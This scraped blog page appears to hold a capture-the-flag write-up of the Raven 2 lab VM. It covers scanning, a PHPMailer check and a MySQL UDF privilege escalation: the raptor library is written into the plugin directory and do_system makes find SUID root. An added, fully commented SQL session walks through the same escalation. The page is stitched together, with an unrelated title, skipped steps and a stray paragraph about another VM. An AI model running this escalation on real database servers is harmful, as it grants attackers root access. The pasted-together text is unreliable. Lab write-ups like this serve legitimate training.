tergasil.blogg.se

Openssh 6.7p1 exploit

Raven 2 is another vulnerable intermediate-level machine by William McCann. The only difference from the first one is that it has four flags to capture.

The virtual machine boots and all we get is a login screen, but there's nothing to see there, so let's scan it:

|_http-server-header: Apache/2.4.10 (Debian)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 25.89 seconds

Kinda standard: SSH for remote administration and HTTP for a web server. There's also some RPC application, but it doesn't look promising.

The website has several links here and there, but nothing too interesting. Nobody does anything from scratch nowadays, so let's look a little closer with dirb:

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

Are there any websites not powered by WordPress out there now? =) We'll get to it later, but now let's go to the vendor directory. You can notice that there's a PHPMailer here, but one file for some reason has a different modification date. Let's take a look at PATH:

/var/www/html/vendor/

Let's also check the PHPMailer version: 5.2.16. It's very dated, so I guess we'll find something useful with searchsploit.

Let's follow the instructions further and run all the necessary commands:

mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/1518.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugins/1518.so';
ERROR 1 (HY000): Can't create/write to file '/usr/lib/mysql/plugins/1518.so' (Errcode: 2)
mysql> select * from foo into dumpfile '/usr/lib/mysql/1518/so';
ERROR 1 (HY000): Can't create/write to file '/usr/lib/mysql/1518/so' (Errcode: 2)
mysql> select * from foo into dumpfile '/tmp/tmp/1518.so';
ERROR 1 (HY000): Can't create/write to file '/tmp/tmp/1518.so' (Errcode: 2)

Errcode 2 is ENOENT: none of those directories exist, so the server can't create the file there. The plugin directory on this box is /usr/lib/mysql/plugin, and the write succeeds once we use it:

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
mysql> create function do_system returns integer soname '1518.so';
mysql> select do_system('chmod u+s /usr/bin/find');

With find now SUID root we can read the remaining flags. One of them is in the root directory:

cd /root

CONGRATULATIONS on successfully rooting RavenII
I hope you enjoyed this second iteration of the Raven VM
Hit me up on Twitter and let me know what you /

There's a neat trick to find the last flag. Since all the flag files are named in a similar way, we'll search the whole machine for this pattern:

# find / -name 'flag*'
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html

It seems that the last flag is in PNG format among the WordPress uploads. We can get it with a browser. All four flags are here, and it means that we owned the Raven machine.

I've recently been approached to help introduce some new folk to the wonderful world of ethical hacking. The assumption is that they may know about the basic theory behind the stages of rooting a target, but have little by way of hands-on experience. Ideally I want to do something that can be completed in a group scenario where everyone can play along and achieve root in a couple of hours tops. After looking around, Toppo seemed to fit the bill quite nicely. Besides, it's also a nice little brain teaser for the more experienced folk to keep themselves sharp too.
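The three failed dumpfile attempts in the Raven 2 write-up above were guesses at the plugin directory. The server will tell you where it loads UDF libraries from (plugin_dir) and whether INTO DUMPFILE is confined to a directory (secure_file_priv), so it is worth asking before writing anything. The session below is an added example, not the write-up's own; it assumes the same 1518.so library (the raptor UDF from exploit-db 1518, which exports do_system) already uploaded to /tmp, a MySQL account holding the FILE privilege, and the /usr/lib/mysql/plugin path that worked on this box.

```sql
-- Added example, not the original write-up's session. Assumes /tmp/1518.so is the
-- compiled raptor UDF library and that the current account holds FILE privilege.

-- 1. Ask the server where it loads plugins from and whether file writes are restricted.
--    CREATE FUNCTION ... SONAME only loads from plugin_dir; an empty secure_file_priv
--    means INTO DUMPFILE may write anywhere the mysqld user can.
SHOW VARIABLES LIKE 'plugin_dir';
SHOW VARIABLES LIKE 'secure_file_priv';
SELECT @@version;

-- 2. Stage the library through a table so it can be written back out byte for byte.
--    LOAD_FILE() needs FILE privilege and the file must be readable by mysqld.
CREATE TABLE foo(line BLOB);
INSERT INTO foo VALUES (LOAD_FILE('/tmp/1518.so'));
SELECT LENGTH(line) FROM foo;   -- NULL here means LOAD_FILE() silently failed

-- 3. Write it into the directory reported by plugin_dir (on this box /usr/lib/mysql/plugin).
--    DUMPFILE, unlike OUTFILE, writes the blob raw with no escaping or line terminators.
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/1518.so';

-- 4. Register the exported symbol and confirm the server accepted it.
CREATE FUNCTION do_system RETURNS INTEGER SONAME '1518.so';
SELECT name, dl FROM mysql.func;

-- 5. The UDF runs as the mysqld user, so this is only a root escalation when mysqld
--    itself runs as root (it did here: chmod on a root-owned binary would fail otherwise).
SELECT do_system('chmod u+s /usr/bin/find');

-- 6. Remove the staging table and the function once done.
DROP FUNCTION do_system;
DROP TABLE foo;
```

If secure_file_priv points at a directory other than plugin_dir, the DUMPFILE step is blocked by the server regardless of filesystem permissions, and the attempt is logged as an error rather than a silent ENOENT.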

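The raw `find / -name 'flag*'` in the write-up above returns more noise from /sys and the Apache manual than real candidates. The shell function below is an added example, not part of the original post: it prunes those trees and matches case-insensitively, so only flag-like regular files remain. The sample tree it builds is constructed for the demonstration; apart from the flag3.png path copied from the output above, the file names under it are made up.

```sh
#!/bin/sh
# Added example, not part of the original write-up.

# find_flags ROOT: search a tree for flag-like file names while pruning the
# directories that produced all the noise above (/sys, /proc and the Apache
# manual under /usr/share/doc). Pass "/" on a real target.
find_flags() {
    root="$1"
    prefix="${root%/}"               # "/" becomes "", "/tmp/x" stays "/tmp/x"
    find "$root" \
        \( -path "$prefix/sys" -o -path "$prefix/proc" -o -path "$prefix/usr/share/doc" \) -prune \
        -o -type f -iname 'flag*' -print 2>/dev/null
}

# make_sample_tree: build a throw-away tree that mimics the layout seen in the
# find output above (noise under /sys and the Apache manual, one real flag in
# the WordPress uploads). Prints the tree's path. File names are constructed.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/sys/devices/platform/serial8250/tty/ttyS0" \
             "$d/usr/share/doc/apache2-doc/manual/en/rewrite" \
             "$d/var/www/html/wordpress/wp-content/uploads/2018/11" \
             "$d/root"
    : > "$d/sys/devices/platform/serial8250/tty/ttyS0/flags"
    : > "$d/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html"
    : > "$d/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png"
    : > "$d/root/FLAG.txt"           # constructed: checks that -iname ignores case
    printf '%s\n' "$d"
}

# Run with --demo to build the sample tree, search it and clean up.
if [ "${1:-}" = "--demo" ]; then
    tree=$(make_sample_tree)
    find_flags "$tree"
    rm -rf "$tree"
fi
```

On the sample tree the function prints only the flag3.png and FLAG.txt paths; the ttyS0/flags and flags.html entries that cluttered the original output are never visited because their parent trees are pruned before descent.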